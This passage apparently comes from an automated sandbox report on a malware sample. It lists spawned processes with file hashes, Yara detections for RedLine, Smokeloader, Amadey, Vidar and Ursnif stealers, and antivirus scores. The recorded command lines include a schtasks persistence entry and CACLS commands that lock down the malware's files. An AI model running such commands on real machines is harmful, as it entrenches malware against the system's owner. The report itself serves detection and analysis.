                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: NaN%, Metadefender, Browse
                                                                                                                                                                      • Detection: 73%, ReversingLabs
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:13
                                                                                                                                                                      Start time:10:38:10
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\3790.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\3790.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:382464 bytes
                                                                                                                                                                      MD5 hash:5E08968D858224A33175069D64DC7F39
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:10:38:13
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\453D.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\453D.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1235912 bytes
                                                                                                                                                                      MD5 hash:F96144B1D5B53D93CAADDDADE38DB5E9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 21%, ReversingLabs
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:10:38:16
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:382464 bytes
                                                                                                                                                                      MD5 hash:5E08968D858224A33175069D64DC7F39
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:10:38:19
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\59FE.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\59FE.exe
                                                                                                                                                                      Imagebase:0x7ff74a220000
                                                                                                                                                                      File size:3188224 bytes
                                                                                                                                                                      MD5 hash:44A7E13ECC55CE9797C5121B230D9927
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:19
                                                                                                                                                                      Start time:10:38:22
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\6644.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\6644.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:342528 bytes
                                                                                                                                                                      MD5 hash:19A79DADDFAAC09499E79ADE27E756F8
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:10:38:23
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                                                                                                                                                                      Imagebase:0xaf0000
                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:10:38:23
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\6CEC.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\6CEC.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:360448 bytes
                                                                                                                                                                      MD5 hash:28A6112DCB54CE6886F7D9ACB8A15E31
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:10:38:24
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:10:38:25
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Target ID:24
                                                                                                                                                                      Start time:10:38:26
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:10:38:27
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:26
                                                                                                                                                                      Start time:10:38:28
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\816F.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\816F.exe
                                                                                                                                                                      Imagebase:0x190000
                                                                                                                                                                      File size:228864 bytes
                                                                                                                                                                      MD5 hash:730A7A6F235525238EE33A2C046C2BA7
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:10:38:29
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:10:38:29
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:382464 bytes
                                                                                                                                                                      MD5 hash:5E08968D858224A33175069D64DC7F39
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:29
                                                                                                                                                                      Start time:10:38:30
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:CACLS "rovwer.exe" /P "user:N"
                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                      File size:27648 bytes
                                                                                                                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:30
                                                                                                                                                                      Start time:10:38:30
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      Imagebase:0x900000
                                                                                                                                                                      File size:341006 bytes
                                                                                                                                                                      MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:10:38:31
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:CACLS "rovwer.exe" /P "user:R" /E
                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                      File size:27648 bytes
                                                                                                                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:10:38:31
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\8C00.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\8C00.exe
                                                                                                                                                                      Imagebase:0xbf0000
                                                                                                                                                                      File size:341006 bytes
                                                                                                                                                                      MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:10:38:32
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                      Imagebase:0x1280000
                                                                                                                                                                      File size:2688096 bytes
                                                                                                                                                                      MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:10:38:32
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      Imagebase:0x900000
                                                                                                                                                                      File size:341006 bytes
                                                                                                                                                                      MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:35
                                                                                                                                                                      Start time:10:38:32
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:10:38:32
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:37
                                                                                                                                                                      Start time:10:38:32
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:CACLS "..\99e342142d" /P "user:N"
                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                      File size:27648 bytes
                                                                                                                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:10:38:34
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                                                                      File size:3933184 bytes
                                                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:10:38:34
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\8C00.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\8C00.exe
                                                                                                                                                                      Imagebase:0xbf0000
                                                                                                                                                                      File size:341006 bytes
                                                                                                                                                                      MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:42
                                                                                                                                                                      Start time:10:38:35
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                      Target ID:43
                                                                                                                                                                      Start time:10:38:35
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:CACLS "..\99e342142d" /P "user:R" /E
                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                      File size:27648 bytes
                                                                                                                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:44
                                                                                                                                                                      Start time:10:38:36
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                                                                      File size:3933184 bytes
                                                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:45
                                                                                                                                                                      Start time:10:38:38
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      Imagebase:0x900000
                                                                                                                                                                      File size:341006 bytes
                                                                                                                                                                      MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:46
                                                                                                                                                                      Start time:10:38:38
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                      No disassembly